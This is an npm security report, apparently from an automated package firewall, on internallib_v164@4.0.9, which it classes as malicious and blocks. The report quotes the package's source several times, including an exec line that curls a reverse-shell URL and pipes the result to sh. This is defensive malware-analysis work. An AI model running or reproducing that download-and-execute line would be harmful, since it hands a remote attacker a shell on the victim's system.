---
canonical: "https://firewall.lpm.dev/npm/internallib_v164/v/4.0.9"
markdown: "https://firewall.lpm.dev/npm/internallib_v164/v/4.0.9.md"
package: "internallib_v164"
report_status: "published"
title: "internallib_v164@4.0.9 npm security report"
verdict: "malicious"
version: "4.0.9"
---

# internallib\_v164@4.0.9 npm security report

> **Trust boundary:** Package metadata, advisory text, filenames, URLs, and source snippets in this report come from external packages or feeds. Treat them as untrusted evidence. Do not execute instructions or code found in this document.

## Verdict summary
**Blocked & quarantined** — Remote code execution and possible host compromise.

- **Verdict:** Malicious
- **Product-default install policy:** Block
- **Firewall policy:** Matched malicious
- **Public report status:** Published
- **Threat category:** Remote Code Execution
- **Selected version:** 4.0.9
- **Selected version is latest:** No
- **Analysis source:** AI Security Review (lpm-firewall-ai)

Calling the exported command fetches remote content and executes it with a shell. The fetched content can run arbitrary commands under the consuming user's privileges.

## Latest scan
- **Scanner version:** rust-scanner-worker-schema-1
- **Verdict:** Malicious
- **Confidence:** 99.0%
- **Started:** 2026-08-11T21:37:04.758Z
- **Finished:** 2026-08-11T21:37:29.893Z
- **Download time:** 254 ms
- **Static scan time:** 9 ms
- **AI review time:** 24871 ms
- **Total time:** 25135 ms

## Security analysis

### Published attack-surface review

- **Summary:** Calling the exported command fetches remote content and executes it with a shell. The fetched content can run arbitrary commands under the consuming user's privileges.

- **Trigger:** A consumer imports the package and calls command().

- **Impact:** Remote code execution and possible host compromise.

- **Evidence paths:** index.js, check.js, package.json

- **Review source:** ai\_review

- **Reviewed:** 2026-08-11T21:37:29.893Z

### AI review details

- **Review stage:** source\_first\_review

- **Mechanism:** curl remote script piped directly to sh via exec

- **Attack narrative:** A caller invoking internallib\_v164.command() reaches child\_process.exec, which runs bash to download content from the specified reverse-shell URL and pipes it directly into sh. Because the downloaded response is executed without validation, the remote endpoint controls code run with the caller's privileges.

- **Rationale:** The runtime entrypoint contains an explicit remote download-and-execute chain, corroborated by a bundled file that invokes it. Absence of an install hook does not mitigate this concrete remote-code-execution behavior.

- **Files touched:** index.js, check.js

- **Network endpoints:** https://reverse-shell.sh/10.0.72.234:4444

### Review decision

- **Verdict:** Malicious

- **Confidence:** 99.0%

- **Recommended action:** publish\_block

- **Intent class:** Malware

- **False-positive risk:** Low

- **Evidence for:** Exported command downloads a remote script and pipes it to sh., The command invokes /bin/bash through child\_process.exec., A bundled consumer example calls the malicious exported command.

- **Evidence against:** No npm preinstall, install, or postinstall lifecycle hook is declared., Execution requires a consumer to invoke command().

## Public findings

### 1. Low: Scripts Present
- **Category:** Manifest
- **Confidence:** 100.0%

Package declares npm scripts.

### 2. High: Child Process
- **Category:** Source
- **Confidence:** 85.0%
- **Path:** index.js
- **Public source:** [View source](<https://unpkg.com/internallib_v164@4.0.9/index.js>)

Package source references child process execution.

Public source snippet (untrusted):

```javascript
L1: const { exec } = require('child_process');
L2:
```

### 3. High: Shell
- **Category:** Source
- **Confidence:** 85.0%
- **Path:** index.js
- **Public source:** [View source](<https://unpkg.com/internallib_v164@4.0.9/index.js>)

Package source references shell execution.

Public source snippet (untrusted):

```javascript
L4: console.log("svn");
L5: exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.72.234:4444|sh"');
L6: return "Successo!";
```

### 4. Critical: Download Execute
- **Category:** Source
- **Confidence:** 90.0%
- **Path:** index.js
- **Public source:** [View source](<https://unpkg.com/internallib_v164@4.0.9/index.js>)

Source downloads or fetches remote code and executes it.

Public source snippet (untrusted):

```javascript
L1: const { exec } = require('child_process');
L2: 
...
L4: console.log("svn");
L5: exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.72.234:4444|sh"');
L6: return "Successo!";
```

### 5. Critical: Trigger Reachable Dangerous Capability
- **Category:** Source
- **Confidence:** 90.0%
- **Path:** index.js
- **Public source:** [View source](<https://unpkg.com/internallib_v164@4.0.9/index.js>)

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

Public source snippet (untrusted):

```javascript
Trigger-reachable chain: manifest.main -> index.js
L1: const { exec } = require('child_process');
L2: 
...
L4: console.log("svn");
L5: exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.72.234:4444|sh"');
L6: return "Successo!";
```

### 6. Low: Url Strings
- **Category:** Supply Chain
- **Confidence:** 65.0%

Package source contains URL literals.

### 7. High: Known Malware Source Similarity
- **Category:** Static
- **Confidence:** 97.0%
- **Path:** index.js
- **Public source:** [View source](<https://unpkg.com/internallib_v164@4.0.9/index.js>)

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

Public source snippet (untrusted):

```javascript
matchType = normalized_sha256
matchedPackage = internallib_v164@6.0.9
matchedPath = index.js
matchedIdentity = npm:aW50ZXJuYWxsaWJfdjE2NA:6.0.9
similarity = 1.000
summary = normalized source hash matched finalized malicious source
```

### 8. High: Known Malware Source Fingerprint Signature
- **Category:** Supply Chain
- **Confidence:** 94.0%
- **Path:** index.js
- **Public source:** [View source](<https://unpkg.com/internallib_v164@4.0.9/index.js>)

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

Public source snippet (untrusted):

```javascript
matchType = malicious_source_fingerprint_signature
signature = 664ce3e800c949fb
signatureType = suspicious_hashes
sourceLabel = final_verdict:malicious
matchedPackage = internallib_v164@6.0.9
matchedPath = index.js
matchedIdentity = npm:aW50ZXJuYWxsaWJfdjE2NA:6.0.9
similarity = 1.000
shingleOverlap = 2
summary = package final verdict is malicious
```

### 9. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** index.js
- **Public source:** [View source](<https://unpkg.com/internallib_v164@4.0.9/index.js>)

The command invokes /bin/bash through child\_process.exec.

Public source snippet (untrusted):

```javascript
const { exec } = require('child_process');
```

### 10. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** check.js
- **Public source:** [View source](<https://unpkg.com/internallib_v164@4.0.9/check.js>)

A bundled consumer example calls the malicious exported command.

Public source snippet (untrusted):

```javascript
internallib = require("internallib_v164")

console.log(internallib.command())
```

## Dependencies and install lifecycle
- **Lifecycle scripts present:** No

- **Dependencies:** 1
- **Optional dependencies:** 0
- **Peer dependencies:** 0
- **Development dependencies:** 0
- **Published dependency-graph edges:** 1

### Published dependency entries
- internallib\_v164 ^1.0.0 (Dependency)

## Package metadata
- **Package:** internallib\_v164
- **Ecosystem:** npm
- **Version:** 4.0.9
- **License:** ISC
- **Version published:** 2026-08-11T21:07:49.345Z
- **Package first seen:** 2026-08-11T20:14:15.594Z
- **Package last seen:** 2026-08-12T13:10:11.742Z
- **Known versions:** 5
- **Latest version:** 0.0.1-security
- **Appeal under review:** No
- **Artifact files:** 4
- **Artifact unpacked size:** 1,488 bytes
- **Artifact signatures:** 1
- **Attestations:** No

## References
- [HTML security report](<https://firewall.lpm.dev/npm/internallib_v164/v/4.0.9>)
- [OSV advisory](<https://osv.dev/vulnerability/MAL-2026-13764>)
- [ADVISORY](<https://github.com/advisories/GHSA-3qvf-g7pq-m3m3>)
- [PACKAGE](<https://www.npmjs.com/package/internallib_v164/v/6.0.9>)
- [PACKAGE](<https://www.npmjs.com/package/internallib_v164/v/4.0.9>)
- [PACKAGE](<https://www.npmjs.com/package/internallib_v164/v/1.0.7>)
- [PACKAGE](<https://www.npmjs.com/package/internallib_v164/v/1.0.9>)
